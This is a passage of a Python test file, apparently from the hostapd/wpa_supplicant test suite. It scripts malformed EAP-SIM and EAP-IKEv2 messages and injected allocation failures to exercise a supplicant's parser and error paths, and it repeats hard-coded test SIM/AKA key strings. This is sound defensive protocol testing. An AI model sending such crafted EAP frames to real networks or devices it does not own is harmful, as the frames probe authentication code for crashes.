if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected AT_CHECKCODE")
return struct.pack(">BBHBBHBBHL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_CHECKCODE, 2, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_VERSION_LIST in Start")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No support version in AT_VERSION_LIST")
return struct.pack(">BBHBBHBBH4B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 3, 2, 3, 4, 5)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBHBBH2H", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH2HBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_START, 0,
EAP_SIM_AT_VERSION_LIST, 2, 2, 1, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_MAC and AT_RAND in Challenge")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: No AT_RAND in Challenge")
return struct.pack(">BBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Insufficient number of challenges in Challenge")
return struct.pack(">BBHBBHBBH4LBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 20 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 5, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too many challenges in Challenge")
return struct.pack(">BBHBBHBBH4L4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 4 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 17, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Same RAND multiple times in Challenge")
return struct.pack(">BBHBBHBBH4L4L4LBBH4L", EAP_CODE_REQUEST,
ctx['id'],
4 + 1 + 3 + 4 + 3 * 16 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_RAND, 13, 0, 0, 0, 0, 0, 0, 0, 0, 1,
0, 0, 0, 0,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16384)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 16385)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with unrecognized non-failure")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification before auth (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 0xc000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Re-authentication (unexpected) with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_REAUTHENTICATION,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, EAP_SIM_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SIM, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(sim_handler)
try:
hapd = start_ap(apdev[0])
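# The credentials below appear to be the usual hwsim Milenage test
# parameters ("Ki:OPc" in hex); their exact values do not matter here
# since the scripted handler never completes a real authentication.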
for i in range(0, 25):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 0 ]:
time.sleep(0.1)
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_sim_errors(dev, apdev):
"""EAP-SIM protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
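# alloc_fail()/fail_test() arm wpa_supplicant's TEST_FAIL instrumentation:
# the count selects which matching call fails and the string is a
# ';'-separated backtrace pattern (in the wpa_supplicant testing code a
# '=' prefix anchors an exact frame and '?' marks an optional one).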
with alloc_fail(dev[0], 1, "eap_sim_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1, "os_get_random;eap_sim_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_sim_response_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "os_get_random;eap_sim_msg_add_encr_start"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with fail_test(dev[0], 1, "os_get_random;eap_sim_init_for_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_sim_process_reauthentication"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "eap_sim_verify_mac;eap_sim_process_challenge"),
(1, "eap_sim_parse_encr;eap_sim_process_challenge"),
(1, "eap_sim_msg_init;eap_sim_response_start"),
(1, "wpabuf_alloc;eap_sim_msg_init;eap_sim_response_start"),
(1, "=eap_sim_learn_ids"),
(2, "=eap_sim_learn_ids"),
(2, "eap_sim_learn_ids"),
(3, "eap_sim_learn_ids"),
(1, "eap_sim_process_start"),
(1, "eap_sim_getKey"),
(1, "eap_sim_get_emsk"),
(1, "eap_sim_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000@domain",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "aes_128_cbc_decrypt;eap_sim_parse_encr") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SIM", identity="1232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
params = int_eap_server_params()
params['eap_sim_db'] = "unix:/tmp/hlr_auc_gw.sock"
params['eap_sim_aka_result_ind'] = "1"
hostapd.add_ap(apdev[1], params)
with alloc_fail(dev[0], 1,
"eap_sim_msg_init;eap_sim_response_notification"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_msg_add_encr_start;eap_sim_response_notification",
"aes_128_cbc_encrypt;eap_sim_response_notification" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_parse_encr;eap_sim_process_notification_reauth" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="SIM", identity="1232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_aka_errors(dev, apdev):
"""EAP-AKA protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(dev[0], 1, "eap_aka_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "=eap_aka_learn_ids"),
(2, "=eap_aka_learn_ids"),
(1, "eap_sim_parse_encr;eap_aka_process_challenge"),
(1, "wpabuf_dup;eap_aka_add_id_msg"),
(1, "wpabuf_resize;eap_aka_add_id_msg"),
(1, "eap_aka_getKey"),
(1, "eap_aka_get_emsk"),
(1, "eap_aka_get_session_id") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000@domain",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
params = int_eap_server_params()
params['eap_sim_db'] = "unix:/tmp/hlr_auc_gw.sock"
params['eap_sim_aka_result_ind'] = "1"
hostapd.add_ap(apdev[1], params)
with alloc_fail(dev[0], 1,
"eap_sim_msg_init;eap_aka_response_notification"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_msg_add_encr_start;eap_aka_response_notification",
"aes_128_cbc_encrypt;eap_aka_response_notification" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ "eap_sim_parse_encr;eap_aka_process_notification_reauth" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP",
scan_freq="2412",
eap="AKA", identity="0232010000000000",
phase1="result_ind=1",
password="90dca4eda45b53cf0f12d7c9c3bc6a89:cb9cccc4b9258e6dca4760379fb82581:000000000123")
dev[0].request("REAUTHENTICATE")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
if ev is None:
raise Exception("EAP method not started on reauthentication")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_aka_prime_errors(dev, apdev):
"""EAP-AKA' protocol tests (error paths)"""
check_hlr_auc_gw_support()
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
with alloc_fail(dev[0], 1, "eap_aka_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
with fail_test(dev[0], 1, "aes_128_cbc_encrypt;eap_aka_response_reauth"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123")
with alloc_fail(dev[0], 1, "eap_sim_parse_encr;eap_aka_process_reauthentication"):
hapd.request("EAPOL_REAUTH " + dev[0].own_addr())
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"], timeout=5)
if ev is None:
raise Exception("EAP re-authentication did not start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
tests = [ (1, "eap_sim_verify_mac_sha256"),
(1, "=eap_aka_process_challenge") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="AKA'", identity="6555444333222111",
password="5122250214c33e723a5dd523fc145fc0:981d464c7c52eb6e5036234984ad0bcf:000000000123",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
def test_eap_proto_ikev2(dev, apdev):
"""EAP-IKEv2 protocol tests"""
check_eap_capa(dev[0], "IKEV2")
global eap_proto_ikev2_test_done
eap_proto_ikev2_test_done = False
def ikev2_handler(ctx, req):
logger.info("ikev2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
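# EAP-IKEv2 (RFC 5106) prefixes each message with a flags octet:
# 0x80 = Length field included, 0x40 = More fragments, 0x20 = Integrity
# Checksum Data present. The cases below mutate these flags and the
# optional 4-octet Message Length to exercise the parser error paths.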
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_IKEV2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated Message Length field")
return struct.pack(">BBHBB3B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_IKEV2, 0x80, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short Message Length value")
return struct.pack(">BBHBBLB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4 + 1,
EAP_TYPE_IKEV2, 0x80, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0x80, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(2)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0x80, 0xffffffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(3)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0xc0, 0xffffffff)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated message(4)")
return struct.pack(">BBHBBL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_IKEV2, 0xc0, 10000000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too long fragments (first fragment)")
